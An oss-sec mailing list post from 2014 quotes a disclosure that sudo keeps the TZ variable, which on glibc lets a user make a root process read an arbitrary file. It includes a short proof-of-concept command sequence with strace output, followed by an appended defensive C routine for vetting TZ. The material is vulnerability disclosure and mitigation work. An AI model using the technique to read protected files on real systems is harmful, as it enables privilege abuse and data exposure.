oss-sec mailing list archives
Re: Abusing TZ for fun (and little profit)
From: Dan McDonald <danmcd () omniti com>
Date: Wed, 15 Oct 2014 19:52:50 -0400
Libraries that use TZ (or any environment variable) should be careful. For example...

http://src.illumos.org/source/xref/illumos-gate/usr/src/lib/libc/port/gen/localtime.c#1417

Thanks for the reality check. Glad we passed.

Dan

Sent from my iPhone (typos, autocorrect, and all)
On Oct 15, 2014, at 6:35 PM, Jakub Wilk <jwilk () jwilk net> wrote:

> By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:
>
>     $ echo moo > tz
>     $ chmod 0 tz
>     $ cat tz
>     cat: tz: Permission denied
>     $ TZ=$PWD/tz sudo -u root strace -e read date
>     read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
>     read(3, "moo\n", 4096) = 4
>     read(3, "", 4096) = 0
>     Wed Oct 15 20:42:42 2014
>     +++ exited with 0 +++
>
> Procmail is another program that recklessly whitelists TZ[2].
>
> [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
> [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13
>
> --
> Jakub Wilk
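One way a privileged wrapper could vet TZ before preserving it across a privilege boundary, given as an added example that is not part of either message and is not code from sudo, procmail or illumos. The helper name tz_value_is_safe and the ZONEINFO_DIR path are assumptions made for illustration.

```c
#include <ctype.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed zoneinfo location and fallback path limit; adjust per platform. */
#define ZONEINFO_DIR "/usr/share/zoneinfo"
#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Hypothetical helper: may this caller-supplied TZ cross a privilege boundary? */
bool tz_value_is_safe(const char *tz)
{
    size_t dirlen = strlen(ZONEINFO_DIR);
    const char *p;

    if (tz == NULL)
        return false;
    if (*tz == ':')          /* glibc reads the rest as a file name */
        tz++;
    /* An absolute path is acceptable only inside the zoneinfo tree. */
    if (*tz == '/' &&
        (strncmp(tz, ZONEINFO_DIR, dirlen) != 0 || tz[dirlen] != '/'))
        return false;
    for (p = tz; *p != '\0'; p++) {
        if (!isgraph((unsigned char)*p))   /* whitespace, control bytes */
            return false;
        /* A ".." component could climb out of the zoneinfo tree. */
        if (p[0] == '.' && p[1] == '.' && (p == tz || p[-1] == '/') &&
            (p[2] == '/' || p[2] == '\0'))
            return false;
    }
    return (size_t)(p - tz) < PATH_MAX;
}

/* Exit non-zero when the inherited TZ should be dropped, not preserved. */
int main(void)
{
    const char *tz = getenv("TZ");

    if (tz != NULL && !tz_value_is_safe(tz)) {
        fprintf(stderr, "TZ rejected: not a zone name or zoneinfo path\n");
        return 1;
    }
    return 0;
}
```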